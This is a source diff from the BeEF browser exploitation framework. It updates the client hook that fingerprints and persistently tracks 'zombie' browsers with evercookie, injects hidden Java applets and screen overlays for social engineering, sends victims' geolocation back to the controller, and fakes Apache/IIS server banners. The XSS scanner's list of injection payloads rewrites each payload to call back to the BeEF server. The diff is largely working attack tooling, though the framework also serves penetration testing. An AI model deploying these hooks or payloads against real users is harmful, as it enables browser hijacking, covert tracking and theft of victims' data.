if (form_submit && form_action)
@@ -127,6 +158,75 @@ beef.dom = {
}
});
},
/**
* Load a full screen div that is black, or, transparent
* @param: {Boolean} vis: whether or not you want the screen dimmer enabled or not
* @param: {Hash} options: a collection of options to customise how the div is configured, as follows:
* opacity:0-100 // Lower number = less grayout higher = more of a blackout
* // By default this is 70
* zindex: # // HTML elements with a higher zindex appear on top of the gray out
* // By default this will use beef.dom.getHighestZindex to always go to the top
* bgcolor: (#xxxxxx) // Standard RGB Hex color code
* // By default this is #000000
*/
grayOut: function(vis, options) {
// in any order. Pass only the properties you need to set.
var options = options || {};
var zindex = options.zindex || beef.dom.getHighestZindex()+1;
var opacity = options.opacity || 70;
var opaque = (opacity / 100);
var bgcolor = options.bgcolor || '#000000';
var dark=document.getElementById('darkenScreenObject');
if (!dark) {
// The dark layer doesn't exist, it's never been created. So we'll
// create it here and apply some basic styles.
// If you are getting errors in IE see: http://support.microsoft.com/default.aspx/kb/927917
var tbody = document.getElementsByTagName("body")[0];
var tnode = document.createElement('div'); // Create the layer.
tnode.style.position='absolute'; // Position absolutely
tnode.style.top='0px'; // In the top
tnode.style.left='0px'; // Left corner of the page
tnode.style.overflow='hidden'; // Try to avoid making scroll bars
tnode.style.display='none'; // Start out Hidden
tnode.id='darkenScreenObject'; // Name it so we can find it later
tbody.appendChild(tnode); // Add it to the web page
dark=document.getElementById('darkenScreenObject'); // Get the object.
}
if (vis) {
// Calculate the page width and height
if( document.body && ( document.body.scrollWidth || document.body.scrollHeight ) ) {
var pageWidth = document.body.scrollWidth+'px';
var pageHeight = document.body.scrollHeight+'px';
} else if( document.body.offsetWidth ) {
var pageWidth = document.body.offsetWidth+'px';
var pageHeight = document.body.offsetHeight+'px';
} else {
var pageWidth='100%';
var pageHeight='100%';
}
//set the shader to cover the entire page and make it visible.
dark.style.opacity=opaque;
dark.style.MozOpacity=opaque;
dark.style.filter='alpha(opacity='+opacity+')';
dark.style.zIndex=zindex;
dark.style.backgroundColor=bgcolor;
dark.style.width= pageWidth;
dark.style.height= pageHeight;
dark.style.display='block';
} else {
dark.style.display='none';
}
},
/**
* Remove all external and internal stylesheets from the current page - sometimes prior to socially engineering,
* or, re-writing a document this is useful.
*/
removeStylesheets: function() {
$j('link[rel=stylesheet]').remove();
$j('style').remove();
},
/**
* Create a form element with the specified parameters, appending it to the DOM if append == true
@@ -284,7 +384,8 @@ beef.dom = {
if (codebase != null) {
content += "<param name='codebase' value='" + codebase + "' />"
}else{
}
if (archive != null){
content += "<param name='archive' value='" + archive + "' />";
}
if (params != null) {
@@ -292,7 +393,7 @@ beef.dom = {
}
content += "</object>";
}
if (beef.browser.isC() || beef.browser.isS() || beef.browser.isO()) {
if (beef.browser.isC() || beef.browser.isS() || beef.browser.isO() || beef.browser.isFF()) {
if (codebase != null) {
content = "" +
@@ -311,24 +412,25 @@ beef.dom = {
}
content += "</applet>";
}
if (beef.browser.isFF()) {
if (codebase != null) {
content = "" +
"<embed id='" + id + "' code='" + code + "' " +
"type='application/x-java-applet' codebase='" + codebase + "' " +
"height='0' width='0' name='" + name + "'>";
} else {
content = "" +
"<embed id='" + id + "' code='" + code + "' " +
"type='application/x-java-applet' archive='" + archive + "' " +
"height='0' width='0' name='" + name + "'>";
}
if (params != null) {
content += beef.dom.parseAppletParams(params);
}
content += "</embed>";
}
// For some reasons JavaPaylod is not working if the applet is attached to the DOM with the embed tag rather than the applet tag.
// if (beef.browser.isFF()) {
// if (codebase != null) {
// content = "" +
// "<embed id='" + id + "' code='" + code + "' " +
// "type='application/x-java-applet' codebase='" + codebase + "' " +
// "height='0' width='0' name='" + name + "'>";
// } else {
// content = "" +
// "<embed id='" + id + "' code='" + code + "' " +
// "type='application/x-java-applet' archive='" + archive + "' " +
// "height='0' width='0' name='" + name + "'>";
// }
//
// if (params != null) {
// content += beef.dom.parseAppletParams(params);
// }
// content += "</embed>";
// }
$j('body').append(content);
},
@@ -375,11 +477,11 @@ beef.dom = {
* @params: {String} rport: remote port
* @params: {String} commands: protocol commands to be executed by the remote host:port service
*/
createIframeIpecForm: function(rhost, rport, commands){
createIframeIpecForm: function(rhost, rport, path, commands){
var iframeIpec = beef.dom.createInvisibleIframe();
var formIpec = document.createElement('form');
formIpec.setAttribute('action', 'http://'+rhost+':'+rport+'/index.html');
formIpec.setAttribute('action', 'http://'+rhost+':'+rport+path);
formIpec.setAttribute('method', 'POST');
formIpec.setAttribute('enctype', 'multipart/form-data');

10
core/main/client/geolocation.js
View File

@@ -32,14 +32,14 @@ beef.geolocation = {
$j.ajax({
error: function(xhr, status, error){
//console.log("[geolocation.js] openstreetmap error");
beef.debug("[geolocation.js] openstreetmap error");
beef.net.send(command_url, command_id, "latitude=" + latitude
+ "&longitude=" + longitude
+ "&osm=UNAVAILABLE"
+ "&geoLocEnabled=True");
},
success: function(data, status, xhr){
//console.log("[geolocation.js] openstreetmap success");
beef.debug("[geolocation.js] openstreetmap success");
var jsonResp = $j.parseJSON(data);
beef.net.send(command_url, command_id, "latitude=" + latitude
@@ -64,16 +64,16 @@ beef.geolocation = {
beef.net.send(command_url, command_id, "latitude=NOT_ENABLED&longitude=NOT_ENABLED&geoLocEnabled=False");
return;
}
//console.log("[geolocation.js] navigator.geolocation.getCurrentPosition");
beef.debug("[geolocation.js] navigator.geolocation.getCurrentPosition");
navigator.geolocation.getCurrentPosition( //note: this is an async call
function(position){ // success
var latitude = position.coords.latitude;
var longitude = position.coords.longitude;
//console.log("[geolocation.js] success getting position. latitude [%d], longitude [%d]", latitude, longitude);
beef.debug("[geolocation.js] success getting position. latitude [%d], longitude [%d]", latitude, longitude);
beef.geolocation.getOpenStreetMapAddress(command_url, command_id, latitude, longitude);
}, function(error){ // failure
//console.log("[geolocation.js] error [%d] getting position", error.code);
beef.debug("[geolocation.js] error [%d] getting position", error.code);
switch(error.code) // Returns 0-3
{
case 0:

2
core/main/client/hardware.js
View File

@@ -126,4 +126,4 @@ beef.hardware = {
}
};
beef.regCmp('beef.net.hardware');
beef.regCmp('beef.hardware');

7
core/main/client/init.js
View File

@@ -13,7 +13,8 @@
* and will have a new session id. The new session id will need to know
* the brwoser details. So sendback the browser details again.
*/
BEEFHOOK = beef.session.get_hook_session_id();
beef.session.get_hook_session_id();
if (beef.pageIsLoaded) {
beef.net.browser_details();
@@ -31,7 +32,7 @@ window.onpopstate = function (event) {
try {
callback(event);
} catch (e) {
console.log("window.onpopstate - couldn't execute callback: " + e.message);
beef.debug("window.onpopstate - couldn't execute callback: " + e.message);
}
return false;
}
@@ -46,7 +47,7 @@ window.onclose = function (event) {
try {
callback(event);
} catch (e) {
console.log("window.onclose - couldn't execute callback: " + e.message);
beef.debug("window.onclose - couldn't execute callback: " + e.message);
}
return false;
}

1301
core/main/client/lib/deployJava.js Normal file
View File

File diff suppressed because it is too large Load Diff

2
core/main/client/net/dns.js
View File

@@ -43,7 +43,7 @@ beef.net.dns = {
// sends a DNS request
sendQuery = function(query) {
//console.log("Requesting: "+query);
beef.debug("Requesting: "+query);
var img = new Image;
img.src = "http://"+query;
img.onload = function() { dom.removeChild(this); }

28
core/main/client/net/xssrays.js
View File

@@ -49,22 +49,20 @@ beef.net.xssrays = {
//browser-specific attack vectors available strings: ALL, FF, IE, S, C, O
vectors: [
// {input:"',XSS,'", name: 'Standard DOM based injection single quote', browser: 'ALL',url:true,form:true,path:true},
{input:"\',XSS,\'", name: 'Standard DOM based injection single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'",XSS,"', name: 'Standard DOM based injection double quote', browser: 'ALL',url:true,form:true,path:true},
// {input:'\'><script>XSS<\/script>', name: 'Standard script injection single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'"><script>XSS<\/script>', name: 'Standard script injection double quote', browser: 'ALL',url:true,form:true,path:true}, //,
// {input:'\'><body onload=\'XSS\'>', name: 'body onload single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'"><body onload="XSS">', name: 'body onload double quote', browser: 'ALL',url:true,form:true,path:true},
{input:'\'"><script>XSS<\/script>', name: 'Standard script injection', browser: 'ALL',url:true,form:true,path:true},
{input:'\'"><body onload="XSS">', name: 'body onload', browser: 'ALL',url:true,form:true,path:true},
{input:'%27%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'%22%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
{input:'%25%32%37%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'%25%32%32%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
{input:'%%32%35%%33%32%%33%32%%32%35%%33%33%%34%35%%32%35%%33%33%%34%33%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35XSS%%32%35%%33%33%%34%33%%32%35%%33%32%%34%36%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35', name: 'double nibble url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
// {input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true}
// {input:'" type=image src=null onerror=XSS " \' type=image src=null onerror=XSS \'', name: 'Image input overwrite based injection', browser: 'ALL',url:true,form:true,path:true},
// {input:"' onload='XSS' \" onload=\"XSS\"/onload=\"XSS\"/onload='XSS'/", name: 'onload event injection', browser: 'ALL',url:true,form:true,path:true},
// {input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true},
// {input:"'},XSS,function x(){//", name: 'DOM based function breaker single quote', browser: 'ALL',url:true,form:true,path:true},
{input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true},
{input:'" type=image src=null onerror=XSS " \' type=image src=null onerror=XSS \'', name: 'Image input overwrite based injection', browser: 'ALL',url:true,form:true,path:true},
{input:"' onload='XSS' \" onload=\"XSS\"/onload=\"XSS\"/onload='XSS'/", name: 'onload event injection', browser: 'ALL',url:true,form:true,path:true},
{input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true},
{input:"'},XSS,function x(){//", name: 'DOM based function breaker single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'"},XSS,function x(){//', name: 'DOM based function breaker double quote', browser: 'ALL',url:true,form:true,path:true},
{input:'\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3eXSS\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e', name: 'DOM based innerHTML injection', browser: 'ALL',url:true,form:true,path:true},
{input:'javascript:XSS', name: 'Javascript protocol injection', browser: 'ALL',url:true,form:true,path:true},
@@ -107,7 +105,7 @@ beef.net.xssrays = {
// util function. Print string to the console only if the debug flag is on and the browser is not IE.
printDebug:function(log) {
if (this.debug && (!beef.browser.isIE6() && !beef.browser.isIE7() && !beef.browser.isIE8())) {
console.log("[XssRays] " + log);
beef.debug("[XssRays] " + log);
}
},
@@ -340,8 +338,8 @@ beef.net.xssrays = {
beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.poc = pocurl;
beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
+ "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
beefCallback = "location='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
+ "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
exploit = vector.input.replace(/XSS/g, beefCallback);
@@ -368,7 +366,7 @@ beef.net.xssrays = {
beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
+ "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
+ "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
exploit = vector.input.replace(/XSS/g, beefCallback);
@@ -424,7 +422,7 @@ beef.net.xssrays = {
beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
+ "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
+ "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
exploit = beef.net.xssrays.escape(vector.input.replace(/XSS/g, beefCallback));
form += '<textarea name="' + i + '">' + exploit + '<\/textarea>';

15
core/main/client/session.js
View File

@@ -13,7 +13,8 @@ beef.session = {
hook_session_id_length: 80,
hook_session_id_chars: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",
ec: new evercookie(),
ec: new evercookie(),
beefhook: "<%= @hook_session_name %>",
/**
* Gets a string which will be used to identify the hooked browser session
@@ -22,12 +23,12 @@ beef.session = {
*/
get_hook_session_id: function() {
// check if the browser is already known to the framework
var id = this.ec.evercookie_cookie("BEEFHOOK");
var id = this.ec.evercookie_cookie(beef.session.beefhook);
if (typeof id == 'undefined') {
var id = this.ec.evercookie_userdata("BEEFHOOK");
var id = this.ec.evercookie_userdata(beef.session.beefhook);
}
if (typeof id == 'undefined') {
var id = this.ec.evercookie_window("BEEFHOOK");
var id = this.ec.evercookie_window(beef.session.beefhook);
}
// if the browser is not known create a hook session id and set it
@@ -47,9 +48,9 @@ beef.session = {
*/
set_hook_session_id: function(id) {
// persist the hook session id
this.ec.evercookie_cookie("BEEFHOOK", id);
this.ec.evercookie_userdata("BEEFHOOK", id);
this.ec.evercookie_window("BEEFHOOK", id);
this.ec.evercookie_cookie(beef.session.beefhook, id);
this.ec.evercookie_userdata(beef.session.beefhook, id);
this.ec.evercookie_window(beef.session.beefhook, id);
},
/**

3
core/main/client/updater.js
View File

@@ -15,6 +15,7 @@ beef.updater = {
// XHR-polling timeout.
xhr_poll_timeout: "<%= @xhr_poll_timeout %>",
beefhook: "<%= @hook_session_name %>",
// A lock.
lock: false,
@@ -57,7 +58,7 @@ beef.updater = {
get_commands: function() {
try {
this.lock = true;
beef.net.request(beef.net.httpproto, 'GET', beef.net.host, beef.net.port, beef.net.hook, null, 'BEEFHOOK='+beef.session.get_hook_session_id(), 5, 'script', function(response) {
beef.net.request(beef.net.httpproto, 'GET', beef.net.host, beef.net.port, beef.net.hook, null, beef.updater.beefhook+'='+beef.session.get_hook_session_id(), 5, 'script', function(response) {
if (response.body != null && response.body.length > 0)
beef.updater.execute_commands();
});

2
core/main/console/banners.rb
View File

@@ -86,7 +86,7 @@ module Banners
print_success "running on network interface: #{host}"
beef_host = configuration.get("beef.http.public_port") || configuration.get("beef.http.port")
data = "Hook URL: #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.hook_file")}\n"
data += "UI URL: #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.panel_path")}\n"
data += "UI URL: #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.web_ui_basepath")}/panel\n"
print_more data
end

4
core/main/constants/hardware.rb
View File

@@ -34,8 +34,8 @@ module Constants
HW_HTC_IMG = 'htc.ico'
HW_MOTOROLA_UA_STR = 'motorola'
HW_MOTOROLA_IMG = 'motorola.png'
HW_GOOGLE_UA_STR = 'Nexus One'
HE_GOOGLE_IM = 'nexus.png'
HW_GOOGLE_UA_STR = 'Nexus'
HW_GOOGLE_IMG = 'nexus.png'
HW_ERICSSON_UA_STR = 'Ericsson'
HW_ERICSSON_IMG = 'sony_ericsson.png'
HW_ALL_UA_STR = 'All'

75
core/main/handlers/browserdetails.rb
View File

@@ -68,6 +68,7 @@ module BeEF
}
zombie.httpheaders = @http_headers.to_json
zombie.save
#puts "HTTP Headers: #{zombie.httpheaders}"
# add a log entry for the newly hooked browser
BeEF::Core::Logger.instance.register('Zombie', "#{zombie.ip} just joined the horde from the domain: #{log_zombie_domain}:#{log_zombie_port.to_s}", "#{zombie.id}")
@@ -79,6 +80,56 @@ module BeEF
self.err_msg "Invalid browser name returned from the hook browser's initial connection."
end
# detect browser proxy
using_proxy = false
[
'CLIENT_IP',
'FORWARDED_FOR',
'FORWARDED',
'FORWARDED_FOR_IP',
'PROXY_CONNECTION',
'PROXY_AUTHENTICATE',
'X_FORWARDED',
'X_FORWARDED_FOR',
'VIA'
].each do |header|
unless JSON.parse(zombie.httpheaders)[header].nil?
using_proxy = true
break
end
end
# retrieve proxy client IP
proxy_clients = []
[
'CLIENT_IP',
'FORWARDED_FOR',
'FORWARDED',
'FORWARDED_FOR_IP',
'X_FORWARDED',
'X_FORWARDED_FOR'
].each do |header|
proxy_clients << "#{JSON.parse(zombie.httpheaders)[header]}" unless JSON.parse(zombie.httpheaders)[header].nil?
end
# retrieve proxy server
proxy_server = JSON.parse(zombie.httpheaders)['VIA'] unless JSON.parse(zombie.httpheaders)['VIA'].nil?
# store and log proxy details
if using_proxy == true
BD.set(session_id, 'UsingProxy', "#{using_proxy}")
proxy_log_string = "#{zombie.ip} is using a proxy"
unless proxy_clients.nil?
BD.set(session_id, 'ProxyClient', "#{proxy_clients.sort.uniq.join(',')}")
proxy_log_string += " [client: #{proxy_clients.sort.uniq.join(',')}]"
end
unless proxy_server.nil?
BD.set(session_id, 'ProxyServer', "#{proxy_server}")
proxy_log_string += " [server: #{proxy_server}]"
end
BeEF::Core::Logger.instance.register('Zombie', "#{proxy_log_string}", "#{zombie.id}")
end
# get and store browser version
browser_version = get_param(@data['results'], 'BrowserVersion')
if BeEF::Filters.is_valid_browserversion?(browser_version)
@@ -199,14 +250,6 @@ module BeEF
self.err_msg "Invalid window size returned from the hook browser's initial connection."
end
# get and store the yes|no value for JavaEnabled
java_enabled = get_param(@data['results'], 'JavaEnabled')
if BeEF::Filters.is_valid_yes_no?(java_enabled)
BD.set(session_id, 'JavaEnabled', java_enabled)
else
self.err_msg "Invalid value for JavaEnabled returned from the hook browser's initial connection."
end
# get and store the yes|no value for VBScriptEnabled
vbscript_enabled = get_param(@data['results'], 'VBScriptEnabled')
if BeEF::Filters.is_valid_yes_no?(vbscript_enabled)
@@ -255,6 +298,14 @@ module BeEF
self.err_msg "Invalid value for HasWebSocket returned from the hook browser's initial connection."
end
# get and store the yes|no value for HasWebRTC
has_webrtc = get_param(@data['results'], 'HasWebRTC')
if BeEF::Filters.is_valid_yes_no?(has_webrtc)
BD.set(session_id, 'HasWebRTC', has_webrtc)
else
self.err_msg "Invalid value for HasWebRTC returned from the hook browser's initial connection."
end
# get and store the yes|no value for HasActiveX
has_activex = get_param(@data['results'], 'HasActiveX')
if BeEF::Filters.is_valid_yes_no?(has_activex)
@@ -295,14 +346,6 @@ module BeEF
self.err_msg "Invalid value for HasWMP returned from the hook browser's initial connection."
end
# get and store the yes|no value for HasVLC
has_vlc = get_param(@data['results'], 'HasVLC')
if BeEF::Filters.is_valid_yes_no?(has_vlc)
BD.set(session_id, 'HasVLC', has_vlc)
else
self.err_msg "Invalid value for HasVLC returned from the hook browser's initial connection."
end
# get and store the value for CPU
cpu_type = get_param(@data['results'], 'CPU')
if !cpu_type.nil?

7
core/main/handlers/hookedbrowsers.rb
View File

@@ -51,13 +51,18 @@ module Handlers
# @note is a known browser so send instructions
else
# @note Check if we haven't seen this browser for a while, log an event if we haven't
if (Time.new.to_i - hooked_browser.lastseen.to_i) > 60
BeEF::Core::Logger.instance.register('Zombie',"#{hooked_browser.ip} appears to have come back online","#{hooked_browser.id}")
end
# @note record the last poll from the browser
hooked_browser.lastseen = Time.new.to_i
# @note Check for a change in zombie IP and log an event
if config.get('beef.http.use_x_forward_for') == true
if hooked_browser.ip != request.env["HTTP_X_FORWARDED_FOR"]
BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.env["HTTP_X_FORWARDED_FOR"]}")
BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.env["HTTP_X_FORWARDED_FOR"]}","#{hooked_browser.id}")
hooked_browser.ip = request.env["HTTP_X_FORWARDED_FOR"]
end
else

3
core/main/handlers/modules/beefjs.rb
View File

@@ -80,8 +80,9 @@ module BeEF
# @note set the XHR-polling timeout
hook_session_config['xhr_poll_timeout'] = config.get("beef.http.xhr_poll_timeout")
# @note set the hook file path
# @note set the hook file path and BeEF's cookie name
hook_session_config['hook_file'] = config.get("beef.http.hook_file")
hook_session_config['hook_session_name'] = config.get("beef.http.hook_session_name")
# @note if http_port <> public_port in config ini, use the public_port
unless hook_session_config['beef_public_port'].nil?

2
core/main/models/browserdetails.rb
View File

@@ -80,6 +80,7 @@ module Models
return BeEF::Core::Constants::Os::OS_UNKNOWN_IMG if ua_string.nil?
return BeEF::Core::Constants::Os::OS_WINDOWS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_WINDOWS_UA_STR
return BeEF::Core::Constants::Os::OS_ANDROID_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_ANDROID_UA_STR
return BeEF::Core::Constants::Os::OS_LINUX_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_LINUX_UA_STR
return BeEF::Core::Constants::Os::OS_QNX_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_QNX_UA_STR
return BeEF::Core::Constants::Os::OS_BEOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BEOS_UA_STR
@@ -91,7 +92,6 @@ module Models
return BeEF::Core::Constants::Os::OS_MAEMO_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAEMO_UA_STR
return BeEF::Core::Constants::Os::OS_MAC_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAC_UA_STR
return BeEF::Core::Constants::Os::OS_BLACKBERRY_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BLACKBERRY_UA_STR
return BeEF::Core::Constants::Os::OS_ANDROID_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_ANDROID_UA_STR
BeEF::Core::Constants::Os::OS_UNKNOWN_IMG
end

7
core/main/rest/api.rb
View File

@@ -37,12 +37,19 @@ module BeEF
end
end
module RegisterServerHandler
def self.mount_handler(server)
server.mount('/api/server', BeEF::Core::Rest::Server.new)
end
end
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterHooksHandler, BeEF::API::Server, 'mount_handler')
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterModulesHandler, BeEF::API::Server, 'mount_handler')
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterCategoriesHandler, BeEF::API::Server, 'mount_handler')
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterLogsHandler, BeEF::API::Server, 'mount_handler')
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterAdminHandler, BeEF::API::Server, 'mount_handler')
BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterServerHandler, BeEF::API::Server, 'mount_handler')
#
# Check the source IP is within the permitted subnet

41
core/main/rest/handlers/server.rb Normal file
View File

@@ -0,0 +1,41 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
module Rest
class Server < BeEF::Core::Router::Router
config = BeEF::Core::Configuration.instance
http_server = BeEF::Core::Server.instance
before do
error 401 unless params[:token] == config.get('beef.api_token')
halt 401 if not BeEF::Core::Rest.permitted_source?(request.ip)
headers 'Content-Type' => 'application/json; charset=UTF-8',
'Pragma' => 'no-cache',
'Cache-Control' => 'no-cache',
'Expires' => '0'
end
# @note Binds a local file to a specified path in BeEF's web server
post '/bind' do
request.body.rewind
begin
data = JSON.parse request.body.read
mount = data['mount']
local_file = data['local_file']
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind(local_file, mount)
status 200
rescue Exception => e
error 400
end
end
end
end
end
end

27
core/main/router/router.rb
View File

@@ -81,21 +81,40 @@ module BeEF
case type
when "apache"
headers "Server" => "Apache/2.2.3 (CentOS)",
"Content-Type" => "text/html"
"Content-Type" => "text/html; charset=UTF-8"
when "iis"
headers "Server" => "Microsoft-IIS/6.0",
"X-Powered-By" => "ASP.NET",
"Content-Type" => "text/html"
"Content-Type" => "text/html; charset=UTF-8"
else
print_error "You have and error in beef.http.web_server_imitation.type! Supported values are: apache, iis."
end
end
# @note If CORS are enabled, expose the appropriate headers
# this apparently duplicate code is needed to reply to preflight OPTIONS requests, which need to respond with a 200
# and be able to handle requests with a JSON content-type
if request.request_method == 'OPTIONS' && config.get("beef.http.restful_api.allow_cors")
allowed_domains = config.get("beef.http.restful_api.cors_allowed_domains")
headers "Access-Control-Allow-Origin" => allowed_domains,
"Access-Control-Allow-Methods" => "POST, GET",
"Access-Control-Allow-Headers" => "Content-Type"
halt 200
end
# @note If CORS are enabled, expose the appropriate headers
if config.get("beef.http.restful_api.allow_cors")
allowed_domains = config.get("beef.http.restful_api.cors_allowed_domains")
headers "Access-Control-Allow-Origin" => allowed_domains,
"Access-Control-Allow-Methods" => "POST, GET"
end
end
# @note Default root page
get "/" do
if config.get("beef.http.web_server_imitation.enable")
bp = config.get "beef.http.web_ui_basepath"
type = config.get("beef.http.web_server_imitation.type")
case type
when "apache"
@@ -191,7 +210,7 @@ module BeEF
"<h2>If you are the website administrator:</h2>" +
"<p>You may now add content to the directory <tt>/var/www/html/</tt>. Note that until you do so, people visiting your website will see this page and not your content. To prevent this page from ever being used, follow the instructions in the file <tt>/etc/httpd/conf.d/welcome.conf</tt>.</p>" +
"<p>You are free to use the images below on Apache and CentOS Linux powered HTTP servers. Thanks for using Apache and CentOS!</p>" +
"<p><a href=\"http://httpd.apache.org/\"><img src=\"/ui/media/images/icons/apache_pb.gif\" alt=\"[ Powered by Apache ]\"/></a> <a href=\"http://www.centos.org/\"><img src=\"/ui/media/images/icons/powered_by_rh.png\" alt=\"[ Powered by CentOS Linux ]\" width=\"88\" height=\"31\" /></a></p>" +
"<p><a href=\"http://httpd.apache.org/\"><img src=\"#{bp}/media/images/icons/apache_pb.gif\" alt=\"[ Powered by Apache ]\"/></a> <a href=\"http://www.centos.org/\"><img src=\"#{bp}/media/images/icons/powered_by_rh.png\" alt=\"[ Powered by CentOS Linux ]\" width=\"88\" height=\"31\" /></a></p>" +
"</div>" +
"</div>" +
"</div>" +
@@ -216,7 +235,7 @@ module BeEF
"<table>" +
"<tr>" +
"<td ID=tableProps width=70 valign=top align=center>" +
"<img ID=pagerrorImg src=\"/ui/media/images/icons/pagerror.gif\" width=36 height=48>" +
"<img ID=pagerrorImg src=\"#{bp}/media/images/icons/pagerror.gif\" width=36 height=48>" +
"<td ID=tablePropsWidth width=400>" +
"<h1 ID=errortype style=\"font:14pt/16pt verdana; color:#4e4e4e\">" +
"<P ID=Comment1><!--Problem--><P ID=\"errorText\">Under Construction</h1>" +

21
core/main/server.rb
View File

@@ -22,9 +22,10 @@ module BeEF
def initialize
@configuration = BeEF::Core::Configuration.instance
beef_proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
@url = "http://#{beef_host}:#{beef_port}"
@url = "#{beef_proto}://#{beef_host}:#{beef_port}"
@root_dir = File.expand_path('../../../', __FILE__)
@command_urls = {}
@mounts = {}
@@ -34,16 +35,18 @@ module BeEF
def to_h
{
'beef_version' => VERSION,
'beef_url' => @url,
'beef_version' => VERSION,
'beef_url' => @url,
'beef_root_dir' => @root_dir,
'beef_host' => @configuration.get('beef.http.host'),
'beef_port' => @configuration.get('beef.http.port'),
'beef_public' => @configuration.get('beef.http.public'),
'beef_host' => @configuration.get('beef.http.host'),
'beef_port' => @configuration.get('beef.http.port'),
'beef_public' => @configuration.get('beef.http.public'),
'beef_public_port' => @configuration.get('beef.http.public_port'),
'beef_dns' => @configuration.get('beef.http.dns'),
'beef_hook' => @configuration.get('beef.http.hook_file'),
'beef_proto' => @configuration.get('beef.http.https.enable') == true ? "https" : "http"
'beef_dns_host' => @configuration.get('beef.http.dns_host'),
'beef_dns_port' => @configuration.get('beef.http.dns_port'),
'beef_hook' => @configuration.get('beef.http.hook_file'),
